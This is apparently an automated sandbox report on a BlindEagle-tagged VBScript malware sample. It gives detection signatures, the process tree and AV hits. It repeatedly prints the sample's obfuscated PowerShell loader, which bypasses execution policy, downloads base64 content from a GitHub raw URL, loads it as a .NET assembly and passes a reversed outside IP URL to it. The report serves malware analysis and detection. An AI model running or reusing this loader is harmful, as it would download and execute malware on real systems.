Windows Analysis Report
2THp7fwNQD.vbs

Overview

General Information

Sample name: 2THp7fwNQD.vbs (renamed because original name is a hash value)
Original sample name: 2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177.vbs
Analysis ID: 1523825
MD5: ae530aa8e50d1d20e9d0ec5ba8eaf303
SHA1: 345200f8cc77dd41076b833f762a10de7f856758
SHA256: 2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177
Tags: BlindEagle, vbs, user-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6376 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 6652 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x29a3:$b3: ::UTF8.GetString(
  • 0x2f49:$b3: ::UTF8.GetString(
  • 0x7683:$b3: ::UTF8.GetString(
  • 0x9893:$b3: ::UTF8.GetString(
  • 0x9f6f:$b3: ::UTF8.GetString(
  • 0xb8a4:$b3: ::UTF8.GetString(
  • 0xb951:$b3: ::UTF8.GetString(
  • 0xbecd:$b3: ::UTF8.GetString(
  • 0x19680:$b3: ::UTF8.GetString(
  • 0x19c2d:$b3: ::UTF8.GetString(
  • 0x1ab74:$b3: ::UTF8.GetString(
  • 0x1b26f:$b3: ::UTF8.GetString(
  • 0x1baf9:$b3: ::UTF8.GetString(
  • 0x1c23f:$b3: ::UTF8.GetString(
  • 0x1ca71:$b3: ::UTF8.GetString(
  • 0x1d300:$b3: ::UTF8.GetString(
  • 0x1eb8c:$b3: ::UTF8.GetString(
  • 0x411fb:$b3: ::UTF8.GetString(
  • 0x417a1:$b3: ::UTF8.GetString(
  • 0x4892d:$b3: ::UTF8.GetString(
  • 0x48eda:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 5048 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x168c33:$b2: ::FromBase64String(
  • 0x16a344:$b2: ::FromBase64String(
  • 0x13fef:$s1: -join
  • 0x1474f:$s1: -join
  • 0x1f425:$s1: -jOiN
  • 0x1f81d:$s1: -jOiN
  • 0xa871e:$s1: -jOiN
  • 0xb6744:$s1: -join
  • 0xc39c5:$s1: -join
  • 0xc6e87:$s1: -join
  • 0xc7521:$s1: -join
  • 0xc901d:$s1: -join
  • 0xcb27f:$s1: -join
  • 0xcbaa6:$s1: -join
  • 0xcc317:$s1: -join
  • 0xcca52:$s1: -join
  • 0xcca84:$s1: -join
  • 0xccacc:$s1: -join
  • 0xccaeb:$s1: -join
  • 0xcd33c:$s1: -join
  • 0xcd4b8:$s1: -join

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Source: Process started | Author: Thomas Patzke | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7I
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", ProcessId: 6376, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", ProcessId: 6376, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7I
No Suricata rule has matched

AV Detection

Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | Virustotal: Detection: 6%
Source: http://107.172.130.147 | Virustotal: Detection: 7%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.8% probability
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.12:49710 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbCB source: powershell.exe, 00000004.00000002.2386191358.00000207290C5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
